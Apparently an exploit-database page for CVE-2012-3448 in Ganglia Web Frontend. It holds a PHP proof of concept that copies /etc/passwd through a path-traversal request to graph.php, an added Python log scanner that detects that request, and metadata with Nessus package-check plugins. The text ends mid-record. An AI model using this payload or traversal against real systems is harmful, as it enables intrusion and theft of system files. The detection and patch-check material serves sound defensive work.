Ganglia Web Frontend < 3.5.1 - PHP Code Execution Exploit
2015-08-31T00:00:00
ID: 1337DAY-ID-24175
Type: zdt
Reporter: Andrei Costin
Modified: 2015-08-31T00:00:00
Description
Exploit for php platform in category web applications
<?php
/*
################################################################################
#
# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)
# Desc : CVE-2012-3448 PoC
# Details : This PoC will create a dummy file in the /tmp folder and
# will copy /etc/passwd to /tmp.
# To modify the attack payload, modify the code below.
# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0
#
################################################################################
1. Assuming that ganglia is installed on the target machine at this path:
/var/www/html/ganglia/
2. Assuming the attacker has minimal access to the target machine and
can write to "/tmp". There are several methods where a remote attacker can
also trigger daemons or other system processes to create files in "/tmp"
whose content is (partially) controlled by the remote attacker.
3. The attacker puts the contents of this PoC file into the file:
/tmp/attack.php
4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1
as:
http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY
5. Confirm that the PoC created a dummy file in the /tmp folder and copied
/etc/passwd to /tmp.
*/
eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");');
die("Triggering CVE-2012-3448 attack.php");
?>
# 0day.today [2017-12-31] #
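The request in step 4 leaves a recognisable trace in the web server's access log. As an added example (not part of the original PoC or of Ganglia's code), the scanner below flags `graph.php` requests whose `g` parameter contains a parent-directory segment, an absolute path or a NUL byte; the log lines, addresses and function names are constructed for illustration and assume the combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Aug/2015:10:00:01 +0000] '
    '"GET /ganglia/graph.php?g=load_report&z=small&c=web HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Aug/2015:10:00:05 +0000] '
    '"GET /ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY '
    'HTTP/1.1" 200 37',
    '198.51.100.7 - - [31/Aug/2015:10:00:09 +0000] '
    '"GET /ganglia/graph.php?metric=DUMMY&g=..%2F..%2Ftmp%2Fattack HTTP/1.1" 200 37',
    '192.0.2.10 - - [31/Aug/2015:10:00:12 +0000] '
    '"GET /ganglia/index.php?c=web&g=../x HTTP/1.1" 200 900',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded).

    Over-decoding is harmless for detection and means nested encodings
    are compared in the same normal form as plain ones.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_graph_param(target):
    """Return the normalised `g` value if it looks like a path, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/graph.php"):
        return None
    # parse_qs decodes once; a parameter may also appear more than once.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("g", []):
        g = fully_decode(raw).replace("\\", "/")
        if "\x00" in g or g.startswith("/") or ".." in g.split("/"):
            return g
    return None


def scan(lines):
    """Return (line number, client address, normalised g) for each hit."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        g = suspicious_graph_param(match.group("target"))
        if g is not None:
            hits.append((lineno, line.split()[0], g))
    return hits


if __name__ == "__main__":
    for lineno, client, g in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} requested graph.php with g={g!r}")
```

A hit on a host running Ganglia Web Frontend older than 3.5.1 warrants checking `/tmp` and other world-writable directories for unexpected `.php` files.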
{"published": "2015-08-31T00:00:00", "id": "1337DAY-ID-24175", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T01:49:37", "bulletin": {"published": "2015-08-31T00:00:00", "id": "1337DAY-ID-24175", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 3.3, "modified": "2016-04-19T01:49:37"}}, "hash": "1d75add5187c9e7f8ee095b042d3534c795d4bcd2063bfd299d8575e5fea5cdd", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T01:49:37", "edition": 1, "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution Exploit", "href": "http://0day.today/exploit/description/24175", "modified": "2015-08-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": ["CVE-2012-3448"], "sourceHref": "http://0day.today/exploit/24175", "references": [], "reporter": "Andrei Costin", "sourceData": "<?php\r\n/*\r\n \r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n \r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n \r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". 
There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n \r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attach.php\r\n \r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n \r\n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n \r\n*/\r\n \r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n \r\n?>\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6ac4692fb63b7d7014a8bf5e3dd1dcbd", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1994b8292eeb0200beea67fc6984b4a4", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "718acde9080199fdcfde9fec17d66e4b", "key": "href"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "modified"}, {"hash": "60ae5c51b8229a1e8bb925d40217d710", "key": "sourceHref"}, {"hash": "64a7ce0d613028a50980b742a3ed8f09", "key": "reporter"}, {"hash": "c00e09b34bf53aa288e441a6a49ef7c0", "key": "title"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "a58e23fef570b306189524b16aa42ba2ec189aad00b59c4c8a6be9e8b9f16560", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2018-01-01T01:08:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-3448"]}, 
{"type": "packetstorm", "idList": ["PACKETSTORM:133379"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2610.NASL", "FEDORA_2012-10727.NASL", "FEDORA_2012-10699.NASL", "GENTOO_GLSA-201412-10.NASL"]}, {"type": "seebug", "idList": ["SSV:89282"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140197", "OPENVAS:1361412562310892610", "OPENVAS:1361412562310103535", "OPENVAS:892610", "OPENVAS:1361412562310121296"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2610-1:D545E"]}, {"type": "exploitdb", "idList": ["EDB-ID:38030"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28982", "SECURITYVULNS:VULN:12850"]}, {"type": "gentoo", "idList": ["GLSA-201412-10"]}], "modified": "2018-01-01T01:08:44"}, "vulnersScore": 7.2}, "type": "zdt", "lastseen": "2018-01-01T01:08:44", "edition": 2, "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution Exploit", "href": "https://0day.today/exploit/description/24175", "modified": "2015-08-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": ["CVE-2012-3448"], "sourceHref": "https://0day.today/exploit/24175", "references": [], "reporter": "Andrei Costin", "sourceData": "<?php\r\n/*\r\n \r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n \r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n \r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". 
There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n \r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attach.php\r\n \r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n \r\n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n \r\n*/\r\n \r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n \r\n?>\n\n# 0day.today [2017-12-31] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1994b8292eeb0200beea67fc6984b4a4", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "2903b34697cae1ba83ae67a482376e2c", "key": "href"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "modified"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "64a7ce0d613028a50980b742a3ed8f09", "key": "reporter"}, {"hash": "a597e50bcbab490ba97c28c6332adc8d", "key": "sourceData"}, {"hash": "e4f0fd435b67a5b3bcf01a07e0aada3f", "key": "sourceHref"}, {"hash": "c00e09b34bf53aa288e441a6a49ef7c0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"cve": [{"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.", "modified": "2018-08-04T01:29:00", "id": "CVE-2012-3448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3448", "published": "2012-08-06T18:55:00", "title": "CVE-2012-3448", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:17", "bulletinFamily": "exploit", "description": "", "modified": "2015-08-31T00:00:00", "published": "2015-08-31T00:00:00", "href": "https://packetstormsecurity.com/files/133379/Ganglia-Web-Frontend-PHP-Code-Execution.html", "id": "PACKETSTORM:133379", "type": "packetstorm", "title": "Ganglia Web Frontend PHP Code Execution", "sourceData": "`<?php \n/* \n \n################################################################################ \n# \n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re) \n# Desc : CVE-2012-3448 PoC \n# Details : This PoC will create a dummy file in the /tmp folder and \n# will copy /etc/passwd to /tmp. \n# To modify the attack payload, modify the code below.\\ \n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0 \n# \n################################################################################ \n \n1. Assuming that ganglia is installed on the target machine at this path: \n/var/www/html/ganglia/ \n \n2. Assuming the attacker has minimal access to the target machine and \ncan write to \"/tmp\". There are several methods where a remote attacker can \nalso trigger daemons or other system processes to create files in \"/tmp\" \nwhose content is (partially) controlled by the remote attacker. \n \n3. The attacker puts the contents of this PoC file into the file: \n/tmp/attack.php \n \n4. 
The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \nas: \nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY \n \n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \n/etc/passwd to /tmp. \n \n*/ \n \neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");'); \ndie(\"Triggering CVE-2012-3448 attack.php\"); \n \n?> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133379/ganglia-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T06:51:17", "bulletinFamily": "scanner", "description": "Insufficient input sanitization in Ganglia, a web-based monitoring\nsystem, could lead to remote PHP script execution with permissions of\nthe user running the web server.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-2610.NASL", "href": "https://www.tenable.com/plugins/nessus/63640", "published": "2013-01-22T00:00:00", "title": "Debian DSA-2610-1 : ganglia - arbitrary script execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2610. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63640);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:35\");\n\n script_cve_id(\"CVE-2012-3448\");\n script_bugtraq_id(54699);\n script_xref(name:\"DSA\", value:\"2610\");\n\n script_name(english:\"Debian DSA-2610-1 : ganglia - arbitrary script execution\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Insufficient input sanitization in Ganglia, a web-based monitoring\nsystem, could lead to remote PHP script execution with permissions of\nthe user running the web server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683584\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/ganglia\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2610\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ganglia packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"ganglia-monitor\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ganglia-webfrontend\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"gmetad\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libganglia1\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libganglia1-dev\", reference:\"3.1.7-1+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:03:34", "bulletinFamily": "scanner", "description": "Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2012-10699.NASL", "href": "https://www.tenable.com/plugins/nessus/60122", "published": "2012-07-26T00:00:00", "title": "Fedora 17 : ganglia-3.1.7-6.fc17 (2012-10699)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-10699.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60122);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:25:11 $\");\n\n script_cve_id(\"CVE-2012-3448\");\n script_xref(name:\"FEDORA\", value:\"2012-10699\");\n\n script_name(english:\"Fedora 17 : ganglia-3.1.7-6.fc17 (2012-10699)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/084202.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0192704c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ganglia package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"ganglia-3.1.7-6.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ganglia\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:03:34", "bulletinFamily": "scanner", "description": "Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2012-10727.NASL", "href": "https://www.tenable.com/plugins/nessus/60123", "published": "2012-07-26T00:00:00", "title": "Fedora 16 : ganglia-3.1.7-5.fc16 (2012-10727)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-10727.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60123);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:25:11 $\");\n\n script_cve_id(\"CVE-2012-3448\");\n script_xref(name:\"FEDORA\", value:\"2012-10727\");\n\n script_name(english:\"Fedora 16 : ganglia-3.1.7-5.fc16 (2012-10727)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/084196.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd45ba68\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ganglia package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"ganglia-3.1.7-5.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ganglia\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:33:48", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201412-10\n(Multiple packages, Multiple vulnerabilities fixed in 2012)\n\n Vulnerabilities have been discovered in the packages listed below.\n Please review the CVE identifiers in the Reference section for details.\n EGroupware\n VTE\n Layer Four Traceroute (LFT)\n Suhosin\n Slock\n Ganglia\n Jabber to GaduGadu Gateway\n \nImpact :\n\n A context-dependent attacker may be able to gain escalated privileges,\n execute arbitrary code, cause Denial of Service, obtain sensitive\n information, or otherwise bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-201412-10.NASL", "href": "https://www.tenable.com/plugins/nessus/79963", "published": "2014-12-15T00:00:00", "title": "GLSA-201412-10 : Multiple packages, Multiple vulnerabilities fixed in 2012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux 
Security Advisory GLSA 201412-10.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79963);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/12 17:35:38\");\n\n script_cve_id(\"CVE-2008-4776\", \"CVE-2010-2713\", \"CVE-2010-3313\", \"CVE-2010-3314\", \"CVE-2011-0765\", \"CVE-2011-2198\", \"CVE-2012-0807\", \"CVE-2012-0808\", \"CVE-2012-1620\", \"CVE-2012-2738\", \"CVE-2012-3448\");\n script_bugtraq_id(41716, 46477, 48645, 51574, 52642, 52922, 54281, 54699);\n script_xref(name:\"GLSA\", value:\"201412-10\");\n\n script_name(english:\"GLSA-201412-10 : Multiple packages, Multiple vulnerabilities fixed in 2012\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-10\n(Multiple packages, Multiple vulnerabilities fixed in 2012)\n\n Vulnerabilities have been discovered in the packages listed below.\n Please review the CVE identifiers in the Reference section for details.\n EGroupware\n VTE\n Layer Four Traceroute (LFT)\n Suhosin\n Slock\n Ganglia\n Jabber to GaduGadu Gateway\n \nImpact :\n\n A context-dependent attacker may be able to gain escalated privileges,\n execute arbitrary code, cause Denial of Service, obtain sensitive\n information, or otherwise bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All 
